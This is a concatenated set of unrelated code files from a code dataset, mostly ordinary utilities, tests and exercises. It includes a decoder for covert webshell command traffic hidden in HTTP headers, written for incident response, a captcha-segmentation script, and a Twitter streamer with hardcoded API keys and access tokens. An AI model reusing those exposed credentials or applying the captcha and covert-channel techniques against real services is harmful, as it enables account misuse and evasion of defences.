result.scalars().first()\n        return user\n\n    def get_test_user_data(self) -> Dict[str, str]:\n        return {\n            \"name\": \"Test User\",\n            \"email\": \"test@test.com\",\n            \"phone\": \"+123456789\",\n            \"password\": \"test_pwd\"\n        }\n\n    async def get_db_manager(self, model) -> SAManager:\n        return SAManager(get_global_config(), model)\n","sub_path":"tests/functional/sa/orm/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510794555","text":"from setuptools import Command\nimport shutil, fnmatch, os\n\nclass CleanCommand(Command):\n\n    description = \"REMOVE ALL THE DAMN JUNK\"\n\n    buildFiles = [\n        'target',\n        'build',\n        'dist',\n        'deb_dist',\n        'psistats.egg-info',\n        '.eggs'\n    ]\n\n    testFiles = [\n        'coverage.xml',\n        'htmlcov',\n        '.cache',\n        'tests/__pycache__',\n        '.coverage'\n    ]\n\n    user_options = [\n        ('all', 'a', 'Remove all junk'),\n        ('build', 'b', 'Remove all build-related junk'),\n        ('pyc', 'p', 'Remove all compiled python junk'),\n        
('tests', 't', 'Remove all test/coverage junk')\n ]\n\n boolean_options = ['all','build','pyc','tests']\n\n def initialize_options(self):\n self.all = False\n self.build = False\n self.pyc = False\n self.tests = False\n\n def finalize_options(self):\n pass\n\n def _remove_files(self, files):\n for fn in files:\n print('CLEANING JUNK: %s' % fn)\n\n try:\n if os.path.isfile(fn):\n os.remove(fn)\n else:\n shutil.rmtree(fn)\n except OSError:\n pass\n\n def run(self):\n if self.all or self.tests:\n self._remove_files(self.testFiles)\n\n if self.all or self.build:\n self._remove_files(self.buildFiles)\n\n if self.all or self.pyc:\n for root, dirname, filenames in os.walk('.'):\n for filename in fnmatch.filter(filenames, '*.pyc'):\n pycFile = os.path.join(root, filename)\n print('CLEANING JUNK: %s' % pycFile)\n os.remove(pycFile)\n\n","sub_path":"buildcmds/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145614299","text":"\"\"\"\n@summary: This is a test module for the twitter api client\n\"\"\"\nimport os\nimport unittest\n\nfrom topicSearch.apiClients.twitterClient import TwitterClient\n\n# .............................................................................\nclass TestInvalidClient(unittest.TestCase):\n \"\"\"\n @summary: These tests fail to set up a client\n \"\"\"\n\n # .............................\n def setUp(self):\n \"\"\"\n @summary: Since the environment may contain valid credentials, we will\n unset them to set up the test\n \"\"\"\n self.consumerKey = os.environ['CONSUMER_KEY']\n self.consumerSecret = os.environ['CONSUMER_SECRET']\n self.accessToken = os.environ['ACCESS_TOKEN']\n self.accessSecret = os.environ['ACCESS_SECRET']\n \n os.environ['CONSUMER_KEY'] = ''\n os.environ['CONSUMER_SECRET'] = ''\n os.environ['ACCESS_TOKEN'] = ''\n os.environ['ACCESS_SECRET'] = ''\n \n # .............................\n def tearDown(self):\n \"\"\"\n @summary: Restore the environment variables\n \"\"\"\n os.environ['CONSUMER_KEY'] = self.consumerKey\n os.environ['CONSUMER_SECRET'] = self.consumerSecret\n os.environ['ACCESS_TOKEN'] = self.accessToken\n os.environ['ACCESS_SECRET'] = self.accessSecret\n\n # .............................\n def test_missingCredentials(self):\n \"\"\"\n @summary: This test checks that the Twitter API client fails properly \n when the environment variables needed for authentication\n are not set.\n \"\"\"\n self.assertRaises(Exception, TwitterClient)\n \n # .............................\n def test_invalidCredentials(self):\n \"\"\"\n @summary: This test checks that the Twitter API client fails properly \n when the credentials provided through the environment \n variables are not valid.\n @note: The status of the query should be 401\n \"\"\"\n os.environ['CONSUMER_KEY'] = 'some invalid value'\n os.environ['CONSUMER_SECRET'] = 'another bad value'\n os.environ['ACCESS_TOKEN'] = 'invalid'\n os.environ['ACCESS_SECRET'] = 'invalid'\n \n tc = TwitterClient()\n self.assertEqual(tc.query('anything').status_code, 401)\n\n# .............................................................................\nclass TestValidClient(unittest.TestCase):\n \"\"\"\n @summary: These tests assume that an instance of the Twitter API client is \n successfully created and can be used to query\n \"\"\"\n # .............................\n def setUp(self):\n \"\"\"\n @summary: These tests assume that a client has been initialized\n \"\"\"\n self.tc = 
TwitterClient()\n \n # .............................\n def tearDown(self):\n \"\"\"\n @summary: Clean up after test\n \"\"\"\n pass\n \n # .............................\n def test_queryNoGeo(self):\n \"\"\"\n @summary: This test checks that a query works (without a spatial \n component) and that the response looks like what is expected\n \"\"\"\n res = self.tc.query('kabbage')\n # Check that the status code returned is 200\n self.assertEqual(res.status_code, 200)\n \n # .............................\n #def test_geoQuery(self):\n # \"\"\"\n # @summary: This test checks that a query, that uses a location, works \n # correctly and that the response looks how we expect\n # \"\"\"\n # res = self.tc.query('kabbage', useLocation=True)\n # # Check that the status code returned is 200\n # self.assertEqual(res.status_code, 200)\n\n# .............................................................................\nclass TestResponseChange(unittest.TestCase):\n \"\"\"\n @summary: This test checks that an Exception is thrown when the response \n from Twitter appears to have changed.\n \"\"\"\n # .............................\n def setUp(self):\n \"\"\"\n @summary: These tests assume that a client has been initialized\n \"\"\"\n self.tc = TwitterClient()\n \n # .............................\n def test_responseChange(self):\n \"\"\"\n @summary: This test checks that an exception is thrown when all of the\n results have unexpected structure (for example, a property \n could change names)\n \"\"\"\n testResults = [{'newResponse' : 'something new'}]\n \n self.assertRaises(Exception, self.tc.formatResults, testResults)\n \n # .............................\n def test_someResultsChanged(self):\n \"\"\"\n @summary: This test checks that an exception is not raised when only some\n of the results do not have the expected structure. This may\n happen if the view attempts to use a parameter that is not\n always present. 
This may happen with icons or mentions\n \"\"\"\n testResults = [{u'contributors': None, u'truncated': False, \n u'text': u'The Facts About Factoring https://t.co/JPPZiD9hwu via @KabbageInc', \n u'is_quote_status': False, u'in_reply_to_status_id': None, \n u'id': 646041446768766976, u'favorite_count': 0, \n u'source': u'Twitter Web Client', \n u'retweeted': False, u'coordinates': None, u'entities': {\n u'symbols': [], u'user_mentions': [{u'id': 101787835, \n u'indices': [54, 65], u'id_str': u'101787835', \n u'screen_name': u'KabbageInc', u'name': u'Kabbage'}], \n u'hashtags': [], u'urls': [\n {u'url': u'https://t.co/JPPZiD9hwu', \n u'indices': [26, 49], \n u'expanded_url': u'https://www.kabbage.com/blog/the-facts-about-factoring/', \n u'display_url': u'kabbage.com/blog/the-facts\\u2026'}]}, \n u'in_reply_to_screen_name': None, \n u'in_reply_to_user_id': None, u'retweet_count': 0, \n u'id_str': u'646041446768766976', u'favorited': False, \n u'user': {u'follow_request_sent': False, \n u'has_extended_profile': False, \n u'profile_use_background_image': False, \n u'default_profile_image': False, u'id': 279995855, \n u'profile_background_image_url_https': u'https://abs.twimg.com/images/themes/theme7/bg.gif', \n u'verified': False, u'profile_text_color': u'000000', \n u'profile_image_url_https': u'https://pbs.twimg.com/profile_images/600070995475636228/rhXTa489_normal.jpg', \n u'profile_sidebar_fill_color': u'000000', \n u'entities': {u'url': {u'urls': [{\n u'url': u'http://t.co/LCFvG3JIL9', \n u'indices': [0, 22], \n u'expanded_url': u'http://www.lizalton.com', u'display_url': u'lizalton.com'}]}, \n u'description': {u'urls': []}}, u'followers_count': 21977, \n u'profile_sidebar_border_color': u'000000', \n u'id_str': u'279995855', \n u'profile_background_color': u'000000', \n u'listed_count': 114, \n u'is_translation_enabled': False, \n u'utc_offset': None, u'statuses_count': 249, \n u'description': u'Freelance digital marketing writer. Boston girl. 
Nerd.', \n u'friends_count': 11231, u'location': u'Boston', \n u'profile_link_color': u'89C9FA', \n u'profile_image_url': u'http://pbs.twimg.com/profile_images/600070995475636228/rhXTa489_normal.jpg', \n u'following': False, u'geo_enabled': False, \n u'profile_banner_url': u'https://pbs.twimg.com/profile_banners/279995855/1431903216', \n u'profile_background_image_url': u'http://abs.twimg.com/images/themes/theme7/bg.gif', \n u'screen_name': u'Beinglizzie', u'lang': u'en', \n u'profile_background_tile': False, \n u'favourites_count': 69, u'name': u'Elizabeth ', \n u'notifications': False, u'url': u'http://t.co/LCFvG3JIL9', \n u'created_at': u'Sun Apr 10 12:26:38 +0000 2011', \n u'contributors_enabled': False, u'time_zone': None, \n u'protected': False, u'default_profile': False, \n u'is_translator': False}, u'geo': None, \n u'in_reply_to_user_id_str': None, \n u'possibly_sensitive': False, u'lang': u'en', \n u'created_at': u'Mon Sep 21 19:20:58 +0000 2015', \n u'in_reply_to_status_id_str': None, u'place': None, \n u'metadata': {u'iso_language_code': u'en', \n u'result_type': u'recent'}},\n {u'badResponse' : 'cannot process this tweet'}]\n self.tc.formatResults(testResults)\n\n# .............................................................................\nif __name__ == \"__main__\":\n unittest.main()\n ","sub_path":"tests/test_apiClients/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46933216","text":"from bisect import bisect_right\n\nN = int(input())\ncard = [-1] * N\n\nfor i in range(N):\n c = int(input())\n card[i] = c\n\ndp = [float('inf')]\n\nfor c in card:\n i = bisect_right(dp, c)\n if i >= len(dp):\n dp.append(c)\n else:\n dp[i] = c\n\nans = N - len(dp)\nprint(ans)\n","sub_path":"AtCoder/abc/006d.py","file_name":"006d.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365164065","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Name :- Prathamesh S. Kumbhar\n# # ML MAJOR PROJECT\n\n# # TASK:\n# \n# # PREDICT THE TOTAL SCORE OF AN IPL MATCH\n# #DATASET:\n# \n# https://drive.google.com/file/d/1ldUmBu7_IF-1B_m5YYM3fejzs1C11OYS/view?usp=sharing\n# \n\n# 1.Handle missing values.
\n# 2.Drop the unnecessary columns.
\n# 3.Convert the categorical string columns to numerical columns, by using one-hot encoding.
\n# 4.Perform feature scaling (if necessary).
\n# 5.Build a model on the “total” column, using a RandomForestRegressor.
\n# 6.Calculate the score.
\n# 7.Predict on a new set of features (you can create a new dataset, having just 1 row, with your preferred feature values).
\n\n# In[ ]:\n\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ndf = pd.read_csv(\"C:/Users/LIZA MARY MATHEWS/Downloads/ipl2017.csv\")\ndf.head()\n\n\n# # Dropping unneccesary columns\n\n# In[ ]:\n\n\ndf = df.drop(['mid','date'],axis=1)\ndf.head()\n\n\n# In[ ]:\n\n\ndf.describe()\n\n\n# In[ ]:\n\n\n\n\n\n# # Checking unique values\n\n# In[ ]:\n\n\na=df['venue'].unique()\nprint(len(a))\na.sort()\na\n\n\n# In[ ]:\n\n\nb=df['bat_team'].unique()\nprint(b)\nprint(len(b))\n\n\n# In[ ]:\n\n\nc=df['bowl_team'].unique()\nprint(c)\nprint(len(c))\n\n\n# In[ ]:\n\n\ndf = df.replace(\"Rising Pune Supergiants\",\"Rising Pune Supergiant\")\n\n\n# In[ ]:\n\n\nb=df['bat_team'].unique()\nprint(len(b))\nb.sort()\nprint(b)\nc=df['bowl_team'].unique()\nprint(len(c))\nc.sort()\nprint(c)\n\n\n# In[ ]:\n\n\nd=df['batsman'].unique()\nprint(len(d))\nd.sort()\nd\n\n\n# In[ ]:\n\n\ne=df['bowler'].unique()\nprint(len(e))\ne.sort()\ne\n\n\n# In[ ]:\n\n\n\n\n\n# # Handling missing values (if any)\n\n# In[ ]:\n\n\nX = df.drop('total',axis=1)\nprint('Shape of X : ',X.shape)\nprint('Type of X : ',type(X))\n\n\n# In[ ]:\n\n\ny = df['total']\nprint('Shape of y : ',y.shape)\nprint('Type of y : ',type(y))\n\n\n# In[ ]:\n\n\ndf.info()\n\n\n# In[ ]:\n\n\n# No missing values found\n\n\n# # One hot encoding\n\n# In[ ]:\n\n\nX = pd.get_dummies(X,columns=['venue','bat_team','bowl_team','batsman','bowler'])\nX.head()\n\n\n# In[ ]:\n\n\nX.columns\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nplt.hist(df['venue'])\nplt.show()\nplt.hist(df['bat_team'])\nplt.show()\nplt.hist(df['bowl_team'])\nplt.show()\nplt.hist(df['batsman'])\nplt.show()\nplt.hist(df['bowler'])\nplt.show()\nplt.hist(df['runs'])\nplt.show()\nplt.hist(df['wickets'])\nplt.show()\nplt.hist(df['overs'])\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# # Splitting into training and testing sets\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[ ]:\n\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size = 0.2,random_state=42)\n\n\n# In[ ]:\n\n\n\n\n\n# # Scaling\n\n# In[ ]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[ ]:\n\n\nscaler=StandardScaler()\n\n\n# In[ ]:\n\n\nX_train=scaler.fit_transform(X_train)\n\n\n# In[ ]:\n\n\nX_test=scaler.transform(X_test)\n\n\n# In[ ]:\n\n\n\n\n\n# # Random Forest Regressor\n\n# In[ ]:\n\n\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# In[ ]:\n\n\nmodel=RandomForestRegressor()\n\n\n# In[ ]:\n\n\nmodel.fit(X_train,y_train)\n\n\n# In[ ]:\n\n\nmodel.score(X_test,y_test)\n\n\n# In[ ]:\n\n\nmodel.score(X_train,y_train)\n\n\n# In[ ]:\n\n\n\n\n\n# # Predicting on new dataset\n\n# In[ ]:\n\n\ndf_trial= pd.read_csv('C:/Users/LIZA MARY MATHEWS/Desktop/dataset/ipl_small.csv')\n\n\n# In[ ]:\n\n\ndf_trial.head()\n\n\n# In[ ]:\n\n\nmodel.predict(df_trial)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"ML MAJOR PROJECT.py","file_name":"ML MAJOR PROJECT.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303964207","text":"import glob\r\nimport os\r\nimport cv2\r\nimport imutils\r\nimport numpy as np\r\nfrom imutils import contours\r\n\r\ncaptcha_folder = r'D:\\\\captchas\\\\processed_captcha\\\\'\r\nextracted_folder = r'D:\\\\captchas\\\\extracted_chars\\\\'\r\n\r\ncaptcha_images = glob.glob(os.path.join(captcha_folder, '*'))\r\ncounts = {}\r\n\r\nprint(f'Total no of images : {len(captcha_images)}')\r\nindex = 0\r\n\r\n\r\ndef getAvgContour(cont):\r\n arealist = []\r\n for c in cont:\r\n 
area = cv2.contourArea(c)\r\n        arealist.append(area)\r\n    avg = sum(arealist)/len(arealist)\r\n    print(f'Avg Contour Area : {avg}')\r\n    return avg\r\n\r\n\r\ndef get_auto_thresh_value(img, sigma=None):\r\n    if sigma is None:\r\n        sigma = 0.3\r\n    elif isinstance(sigma, int):\r\n        # print(\"int\")\r\n        sigma = float(sigma / pow(10, len(str(sigma))))\r\n    elif isinstance(sigma, float):\r\n        pass\r\n    # print(sigma)\r\n    median = np.median(img)\r\n    # print(median)\r\n    lower = int(max(0, ((1 - sigma) * median)))\r\n    upper = int(min(255, ((1 + sigma) * median)))\r\n    return lower, upper\r\n\r\n\r\ndef get_single_char(img):\r\n    file_name = os.path.basename(img)\r\n    correct_text = os.path.splitext(file_name)[0]\r\n    print(file_name)\r\n    print(correct_text)\r\n    # load image\r\n    image = cv2.imread(img)\r\n    # convert to gray\r\n    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n    lower_thresh, upper_thresh = get_auto_thresh_value(gray, 3) # image , percent of reduction\r\n    print((lower_thresh,upper_thresh))\r\n    thresh = cv2.threshold(gray, lower_thresh, upper_thresh, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n    erode_kernel = cv2.getStructuringElement(cv2.MORPH_ERODE, (2, 2))\r\n    eroded = cv2.erode(thresh, erode_kernel, iterations=3)\r\n    dilate_kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 2))\r\n    dilated = cv2.dilate(eroded, dilate_kernel, iterations=3)\r\n    # opening = cv2.morphologyEx(dilated, cv2.MORPH_ERODE, dilate_kernel,iterations=2)\r\n    # cv2.imshow(\"thesh\", eroded)\r\n    invert = cv2.bitwise_not(dilated)\r\n    # cv2.imshow(\"\",invert)\r\n    dilate_kernel_1 = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\r\n    dilate = cv2.dilate(invert, dilate_kernel_1, iterations=2)\r\n\r\n    cont, hir = cv2.findContours(eroded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n    print(len(cont))\r\n    avg_area = getAvgContour(cont)\r\n    (sorted_cont, boundingBox) = contours.sort_contours(cont, 'left-to-right')\r\n    print(boundingBox)\r\n    letter_image_regions = []\r\n    if len(cont) >= 4:\r\n        for c in sorted_cont:\r\n            (x, y, w, h) = cv2.boundingRect(c)\r\n            if cv2.contourArea(c) > avg_area:\r\n                # roi = invert[y:y + h, x:x + w]\r\n                if w / h > 1.25:\r\n                    half_width = int(w / 2)\r\n                    letter_image_regions.append((x, y, half_width, h)) ## x ,y, w,h \r\n                    letter_image_regions.append((x + half_width, y, half_width, h)) ## x ,y ,w, h\r\n                    # roi = invert[y-2:y + half_width, x+half_width:w]\r\n                    # roi = invert[y - 2:y + h + 2, x - 2:x + w + 2]\r\n                    # rect = cv2.rectangle(image, (start_x, start_y), (end_x, end_y), (0, 0, 255), 1)\r\n                    # cv2.imshow(\"\", rect)\r\n                else:\r\n                    letter_image_regions.append((x,y,w,h))\r\n                    # roi = invert[y-2 : y+h+2, x-2:x+w+2]\r\n                # rect = cv2.rectangle(image,(x,y),(x+w, y+h),(0,255,0),1)\r\n                # cv2.imshow(\"\", rect)\r\n        # cv2.waitKey(0)\r\n        if len(letter_image_regions) != 4:\r\n            return # bail out unless exactly 4 character regions were found\r\n        \r\n        for i in letter_image_regions:\r\n            print(i)\r\n            (x, y, w, h) = i\r\n            cv2.rectangle(image,(x-2,y-2),(x+w, y+h),(0,255,0),1)\r\n            cv2.imshow(\"\",image)\r\n            cv2.waitKey(0)\r\n        \r\n    # cv2.imshow(\"canny\", cv2.Canny(invert,100,200,apertureSize=7,L2gradient = True))\r\n    cv2.imshow(\"\",dilate)\r\n    cv2.imshow(\"or\", image)\r\n    cv2.waitKey(0)\r\n\r\n\r\n\r\nget_single_char(captcha_images[20])","sub_path":"extract_char_from_image.py","file_name":"extract_char_from_image.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282426787","text":"\"\"\"\nIsland Perimeter\nhttps://leetcode.com/problems/island-perimeter/\n\nTime 
O(n*m)\nSpace O(n*m)\n\"\"\"\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n for row in range(len(grid)):\n for col, val in enumerate(grid[row]):\n if val == 1:\n return self.calcPerimeter(grid, row, col)\n return 0\n \n def calcPerimeter(self, grid, row, col) -> int:\n perimeter = 0\n stack = [] # Tuple[int, int]\n stack.append((row, col))\n grid[row][col] = 2\n while stack:\n r, c = stack.pop()\n for dr, dc in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n nr, nc = r + dr, c + dc\n if nr < 0 or nc < 0 or nr >= len(grid) or nc >= len(grid[nr]) or grid[nr][nc] == 0:\n perimeter += 1\n elif grid[nr][nc] == 1:\n grid[nr][nc] = 2\n stack.append((nr, nc))\n return perimeter\n","sub_path":"python/island_perimeter.py","file_name":"island_perimeter.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190801044","text":"import math \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rnd\nimport networkx as nx\nfrom REDSpickle import net_creation\nimport pickle\nimport datetime\n#define global variables N and R\nN=50\nR=0.2\nglobal pos\n\n\ndef euclidean_dist(i,j):\n\t\n\tx1,y1=RGG.node[i]['pos']\n\tx2,y2=RGG.node[j]['pos']\n\treturn math.sqrt((x1-x2)**2+(y1-y2)**2)\n\ndef creation(k):\n\tglobal RGG,pos\n\ttmp_dense=0.0\n\tRGG=nx.Graph()\n\tRGG.add_nodes_from(range(N))\n\tpos={}\n\t\n\tdense=net_creation(k)\n\tfor i in range(N):\n\t\tx=round(rnd.random(),2)\n\t\ty=round(rnd.random(),2)\n\t\t#Allocate the random x,y coordinates\n\t\tRGG.node[i]['pos']=[x,y]\n\t\tpos[i]=RGG.node[i]['pos']\n\n\t\n\tfor i in range(N-1):\n\t\tfor j in range(i+1,N):\n\t\t\tif euclidean_dist(i,j)=dense:\n\t\t\t\tbreak\n\t\tif tmp_dense>=dense:\n\t\t\tbreak\n\nstart=datetime.datetime.now().time()\n#Create 10 networks\nfor i in range(10):\n\tcreation(i)\n\n\tvar=\"pickleRGG/RGG\"+str(i)+\".pickle\"\n\twith open(var, 'wb') as f:\n\t # Pickle the 'data' dictionary using the highest protocol available.\n\t pickle.dump(RGG, f, pickle.HIGHEST_PROTOCOL)\n\nend= datetime.datetime.now().time()\n\nfile=open(\"logfile.txt\",\"w\") \nfile.write(\"Start: \"+str(start)+\" End: \"+str(end))\nfile.close\n\n\n\n\n","sub_path":"random_walk_simulation/RGGpickle.py","file_name":"RGGpickle.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287287221","text":"#!/usr/bin/python\n\nimport time\nfrom dotstar import Adafruit_DotStar\n\nnumpixels = 230 # Number of LEDs in strip\n\n# Here's how to control the strip from any two GPIO pins:\ndatapin = 17\nclockpin = 27\nstrip = Adafruit_DotStar(numpixels, datapin, clockpin)\n\n# Alternate ways of declaring strip:\n# strip = Adafruit_DotStar(numpixels) # Use SPI (pins 10=MOSI, 11=SCLK)\n# strip = Adafruit_DotStar(numpixels, 32000000) # SPI @ ~32 MHz\n# strip = Adafruit_DotStar() # SPI, No pixel buffer\n# strip = Adafruit_DotStar(32000000) # 32 MHz SPI, no pixel buf\n\n# Append \"order='gbr'\" to declaration for proper colors w/older DotStar strips)\n\nstrip.begin() # Initialize pins for output\nstrip.setBrightness(64) # Limit brightness to ~1/4 duty cycle\n\nfor i in range(numpixels):\n strip.setPixelColor(i, 0)\nstrip.show() # Refresh strip\n","sub_path":"turnoff.py","file_name":"turnoff.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358744139","text":"\nclass 
Myclass:\n\n    classvariable = 12\n    def instanceMethod(self):\n        self.instanceVar = 32\n        print(self.instanceVar)\n        return 'instance method called', self\n\n    @classmethod\n    def classMethod(cls):\n        '''\n        class methods receive the class (cls), not the instance, as the implicit first argument\n        This class method has access to Myclass through the cls object\n        '''\n        print(cls.classvariable)\n        \n        return 'class method called', cls\n\n    @staticmethod\n    def staticMethod():\n        \"\"\"\n        static methods don't receive an implicit first argument\n        static methods don't have access to cls or the instance\n        \"\"\"\n        return 'static method called'\n\n\nobj = Myclass()\n\nprint(obj.instanceMethod())\nprint(obj.classMethod())\nprint(obj.staticMethod())","sub_path":"Python/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535300635","text":"import logging\nimport os\nimport sys\n\n\n\nclass LogFilter(object):\n    def __init__(self, level):\n        self.__level = level\n\n    def filter(self, logRecord):\n        return logRecord.levelno <= self.__level\n\nclass LogInit:\n    def __init__(self, logger, level, destination, formatter):\n        self.level = level\n        self.logger = logger\n        self.destination = destination\n        self.formatter = formatter\n\n    def initialize(self) -> None:\n        try:\n            handler = logging.FileHandler(self.destination)\n            handler.setLevel(self.level)\n            handler.setFormatter(self.formatter)\n            handler.addFilter((LogFilter(self.level)))\n            self.logger.addHandler(handler)\n        except Exception as e:\n            exc_type, exc_obj, exc_tb = sys.exc_info()\n            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n            print(e,exc_type, fname, exc_tb.tb_lineno)\n","sub_path":"tasks/webServer/Logs.py","file_name":"Logs.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576649316","text":"# NOTE: Limited error checking or resilience. Provided to help understand\n# the C2 traffic, not as a robust incident response tool.\n\nimport re\nimport urlparse\nfrom hashlib import md5\nimport zlib\nimport hashlib\nimport base64\nimport itertools\n\ndebug = True\n# The key needs to be replaced with the concatenated value found in the PHP file\nkey = 'bed12836'\n\n# The tshark output is generated from the tshark-commands.txt being executed\n# on a PCAP. 
Assumes traffic is limited to the two hosts.\ntshark_output = './cmds.txt'\n\ndef string_xor(input_data, shared_key):\n result = ''\n for a, b in zip(input_data, itertools.cycle(shared_key)):\n result += chr(ord(a) ^ ord(b))\n return result\n\ndef decrypt(input_data):\n need_padding = 4 - len(input_data) % 4\n if need_padding:\n input_data += '=' * need_padding\n return zlib.decompress(string_xor(base64.urlsafe_b64decode(input_data), key))\n\ntry:\n cmd_file = open(tshark_output)\n encoded_command = ''\n last_session = ''\n cmd_count = 0\n for line in cmd_file.readlines():\n line = line.strip()\n #print(line)\n if len(line) == 0:\n continue\n\n headers = line.split('\\t')\n #print(headers)\n if len(headers) == 0:\n continue\n # headers[0] = frame.time_relative\n # headers[1] = http.accept_language\n # headers[2] = http.referer\n lang = headers[1].split(';')\n\n # Get the session id and offsets where the cmd parts are\n session_id = None\n query_offsets = list() # The indexes into the\n for index, parts in enumerate(lang):\n # parts ex: ['is-IS,eo', 'q=0.5,el', 'q=0.7,eo', 'q=0.8']\n if index == 0:\n sess_parts = lang[0].split(',')\n session_id = sess_parts[0][0] + sess_parts[1][0]\n else:\n n = re.match('q=0.(\\d)', parts)\n query_offsets.append(int(n.group(1)))\n\n #print(session_id)\n if session_id != last_session:\n # This is a new session, restart building\n encoded_command = ''\n last_session = session_id\n\n # encoded data\n q = headers[2]\n q = urlparse.urlsplit(q)\n query_parameters = q.query.split('&')\n #print(query_parameters)\n # Extract out the query string values\n query_values = list()\n for q in query_parameters:\n j = q.split('=')\n if debug: print(j)\n\n query_values.append(j[1])\n\n if debug: print(query_values)\n\n #print(query_values)\n\n # Build command from parts in query string\n #print(query_offsets)\n for index in query_offsets:\n encoded_command += query_values[index]\n\n # Calculate Header and Footers\n header = md5(session_id + key[:4]).hexdigest()[:3]\n footer = md5(session_id + key[4:]).hexdigest()[:3]\n if debug:\n print(\"Session ID: {0}\".format(session_id))\n print(\"Header: {0}\".format(header))\n print(\"Footer: {0}\".format(footer))\n print(\"Partial Command: \" + encoded_command)\n\n # Find text between header and footer\n start = encoded_command.find(header) + 3\n end = encoded_command.find(footer)\n\n if end > 0: # Found footer\n enc_cmd = encoded_command[start:end]\n if debug: print(\"Without H/F: \" + enc_cmd)\n cmd_count += 1\n print(\"Time Relative: {0}\".format(headers[0]))\n print(decrypt(enc_cmd) + '\\n')\n\nfinally:\n print(\"Number of commands: {0}\".format(cmd_count))\n\ncmd_file.close()\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165185335","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/7/9 17:38\n# @Author : Zcs\n# @File : get_month.py\n\nimport datetime\n\nd = datetime.datetime.now()\noneday = datetime.timedelta(days=182)\nday = d - oneday\n# forward_day = str(datetime.datetime(day.year, day.month, day.day, day.hour, day.minute, day.second))\ntime_list = [] # 年月列表,例如今天为2018-07-09,那么前半年数据为 2018-01 至 2018-07\ndata_times = []\nfor i in range(day.month, day.month + 7):\n if i <= 12:\n if i < 10:\n time_str = '%s-0%s-01' % (day.year, i)\n else:\n time_str = '%s-%s-01' % (day.year, i)\n else:\n m = i - 12\n year = day.year + 1\n if m < 10:\n time_str = '%s-0%s-01' % (year, m)\n else:\n 
time_str = '%s-%s-01' % (year, m)\n\n time_list.append(time_str)\nprint(time_list)","sub_path":"my_time/get_month.py","file_name":"get_month.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299518166","text":"from __future__ import absolute_import, print_function\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\nimport tweepy\nfrom tweepy.utils import import_simplejson\nimport string\n\n\ndef log_msg(filepath, text, date):\n with open(filepath, \"a\") as myfile:\n myfile.write(date + \"\\n\" + str(text.encode('utf-8')) + \"\\n-------------------------\\n\")\n\n\ndef remove_unprintable(text):\n text = filter(lambda x: x in string.printable, text)\n return text\n\n\nclass StdOutListener(StreamListener):\n \"\"\" A listener handles tweets that are received from the stream.\n This is a basic listener that just prints received tweets to stdout.\n \"\"\"\n\n def on_data(self, data):\n # print(data)\n json_tweet = json.loads(data)\n if \"text\" in json_tweet:\n text = remove_unprintable(json_tweet[\"text\"])\n date = json_tweet[\"created_at\"]\n log_msg(\"output.txt\", text, date)\n\n\nif __name__ == '__main__':\n l = StdOutListener()\n\n consumer_key = \"Es3lDZ9L6ukHRUl1ya5uOTPtx\"\n consumer_secret = \"4UmLc6z65P9Z7nveZnBKssKEnPV71svogCwvhnKaIvM44syi5B\"\n access_token = \"370737927-rr0xbO21qRS92QgCLqvU9qg1FDqic6vuWTlncT0x\"\n access_token_secret = \"ql8fXdZ4acRTDNAi4aZHq1OefpIz6qt8eTXQdj0s79IWK\"\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n 